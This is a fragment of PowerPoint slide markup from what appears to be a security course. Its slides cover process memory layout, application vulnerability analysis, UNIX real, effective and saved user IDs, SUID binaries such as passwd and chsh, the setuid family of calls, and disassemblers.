              <a:rPr lang="it-IT" sz="1200" dirty="0" err="1">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>memory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t> (0xBFFFFFFF)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="985101" name="Rectangle 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5181600" y="4342640"/>
            <a:ext cx="2590800" cy="181071"/>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endParaRPr lang="it-IT" sz="1400">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="985102" name="Rectangle 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5181600" y="4523711"/>
            <a:ext cx="2590800" cy="342900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E6B9B8"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Heap</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="985103" name="Line 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="7010402" y="4430232"/>
            <a:ext cx="3175" cy="34290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latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="985104" name="Rectangle 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5181600" y="2317835"/>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Env/Argv Strings</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="985105" name="Rectangle 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5181600" y="2603584"/>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Env/Argv Pointers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="985106" name="Rectangle 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5181600" y="2889335"/>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Argc</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="985107" name="Rectangle 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5181600" y="4923761"/>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Data (.bss)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="985108" name="Rectangle 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5181600" y="3919537"/>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dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Shared</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t> Libraries</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="211511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5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5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5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50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50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50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5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5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510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8509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85091">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85091">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8509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850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8509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85091">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85091">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8510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85091">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85091">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8510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8510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8510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985091">
                                            <p:txEl>
                                              <p:pRg st="10" end="1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985091">
                                            <p:txEl>
                                              <p:pRg st="11" end="1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85091">
                                            <p:txEl>
                                              <p:pRg st="12" end="12"/>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8510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98509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985091">
                                            <p:txEl>
                                              <p:pRg st="13" end="13"/>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985091">
                                            <p:txEl>
                                              <p:pRg st="14" end="14"/>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85091">
                                            <p:txEl>
                                              <p:pRg st="15" end="15"/>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985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2" grpId="0" animBg="1"/>
      <p:bldP spid="985093" grpId="0" animBg="1"/>
      <p:bldP spid="985094" grpId="0" animBg="1"/>
      <p:bldP spid="985095" grpId="0" animBg="1"/>
      <p:bldP spid="985096" grpId="0" animBg="1"/>
      <p:bldP spid="985097" grpId="0" animBg="1"/>
      <p:bldP spid="985098" grpId="0" animBg="1"/>
      <p:bldP spid="985099" grpId="0"/>
      <p:bldP spid="985100" grpId="0"/>
      <p:bldP spid="985101" grpId="0" animBg="1"/>
      <p:bldP spid="985102" grpId="0" animBg="1"/>
      <p:bldP spid="985103" grpId="0" animBg="1"/>
      <p:bldP spid="985104" grpId="0" animBg="1"/>
      <p:bldP spid="985105" grpId="0" animBg="1"/>
      <p:bldP spid="985106" grpId="0" animBg="1"/>
      <p:bldP spid="985107" grpId="0" animBg="1"/>
      <p:bldP spid="98510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Vulnerability Analysis</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Application vulnerability analysis is the process of identifying vulnerabilities in applications, as deployed in a specific operational environment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Design vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Implementation vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Deployment vulnerabilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="142203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p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Understanding UNIX Processes</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1026051" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Each process has a real UID/GID, an effective UID/GID, and a saved UID/GID </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Real IDs: defines the user who started/owns the process</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Effective IDs: used to determine if the process is "allowed to do things"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Saved IDs: used to drop and re-gain privileges</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>If a program file has the SUID bit set, when a process executes the program the process’ effective UID/GID are changed to the ones of the program file owner</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>adamd@ragnuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>]$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>ls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> -la /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>rwsr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>xr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>-x. 1 root root 30768 Feb 22  2012 /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>passwd</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>adamd@ragnuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>]$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>ls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> -la /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>chsh</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>rws</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>--x--x. 1 root root 20056 Oct 15  2014 /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>chsh</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" b="1" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="731836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0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05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05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60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p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>SUID Behavior</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1028099" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>setuid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>uid_t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) sets the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ruid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>euid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>suid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>uid</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It is allowed only if</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>euid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is 0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>euid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is not 0, but </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>euid</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>seteuid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>uid_t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) sets the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>euid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>uid</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>euid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is not 0, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> must be either the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ruid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> or the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>suid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>setresuid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>uid_t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ruid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>uid_t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>euid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>uid_t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>suid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Allows one to set the three IDs </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Unprivileged processes can only switch among existing values</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>By using the saved UID, a SUID process can securely switch between the the ID of the user invoking the program and the ID of the user owning the executable</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10130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0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09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80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Disassembling</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Disassembling is the process of extracting the assembly representation of a program by analyzing its binary representation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Disassemblers can be:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Linear: linearly parse the instructions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Recursive: attempt to follow the flow of the program</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="184395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
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>adare</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
